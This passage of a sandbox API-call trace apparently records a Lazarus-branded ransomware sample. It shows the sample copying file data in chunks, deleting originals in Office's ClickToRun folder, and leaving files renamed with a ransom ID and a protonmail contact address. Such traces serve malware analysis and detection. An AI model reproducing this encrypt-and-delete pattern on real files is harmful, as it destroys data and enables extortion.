nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.074] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.074] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.074] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.074] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.074] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.074] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.074] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.074] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.074] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.075] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.075] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.075] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.075] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.075] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.075] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.075] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.075] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.076] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.076] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.076] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.076] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.076] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.076] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.076] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.076] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.076] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.077] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.077] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.078] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.078] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.078] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.078] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.078] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.078] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.078] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.078] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.079] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.079] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.079] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x4c0, lpOverlapped=0x0) returned 1 [0094.079] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.079] ReadFile (in: hFile=0x418, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0094.079] WriteFile (in: hFile=0x33c, lpBuffer=0x8f448*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesWritten=0x327ef70*=0x4c0, lpOverlapped=0x0) returned 1 [0094.079] CloseHandle (hObject=0x33c) returned 1 [0094.080] CloseHandle (hObject=0x418) returned 1 [0094.080] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.087] GetFileType (hFile=0x418) returned 0x1 [0094.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82ef8 | out: hHeap=0x20000) returned 1 [0094.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0094.087] GetLastError () returned 0xb7 [0094.087] SetLastError (dwErrCode=0xb7) [0094.087] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0094.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0094.088] CloseHandle (hObject=0x418) returned 1 [0094.089] AreFileApisANSI () returned 1 [0094.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0094.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x88) returned 0x82328 [0094.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x82328, cchWideChar=68 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll") returned 68 [0094.089] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r32.dll")) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82328 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0094.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.090] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.090] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b3e121, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b3e121, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x90a1e490, ftLastWriteTime.dwHighDateTime=0x1d5df27, nFileSizeHigh=0x0, nFileSizeLow=0x127260, dwReserved0=0x1, dwReserved1=0x0, cFileName="C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cAlternateFileName="C2R64D~1.LAZ")) returned 1 [0094.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ef0 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0094.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0094.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ef0 | out: hHeap=0x20000) returned 1 [0094.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c998 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8b9c8 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x110) returned 0x8bbf8 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0094.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bbf8 | out: hHeap=0x20000) returned 1 [0094.091] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0094.091] AreFileApisANSI () returned 1 [0094.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus", lpUsedDefaultChar=0x0) returned 130 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0094.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.091] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.091] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0094.092] AreFileApisANSI () returned 1 [0094.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a8c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 130 [0094.092] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x104) returned 0x8bae0 [0094.092] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a8c0, cbMultiByte=-1, lpWideCharStr=0x8bae0, cchWideChar=130 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 130 [0094.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.092] GetFileType (hFile=0x418) returned 0x1 [0094.092] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0094.092] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0094.092] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0094.092] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0094.093] CloseHandle (hObject=0x418) returned 1 [0094.093] AreFileApisANSI () returned 1 [0094.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a8c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 130 [0094.093] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x104) returned 0x8c288 [0094.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a8c0, cbMultiByte=-1, lpWideCharStr=0x8c288, cchWideChar=130 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 130 [0094.093] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2R64.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0094.093] GetFileType (hFile=0x418) returned 0x1 [0094.093] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c288 | out: hHeap=0x20000) returned 1 [0094.093] CloseHandle (hObject=0x418) returned 1 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.094] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.094] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 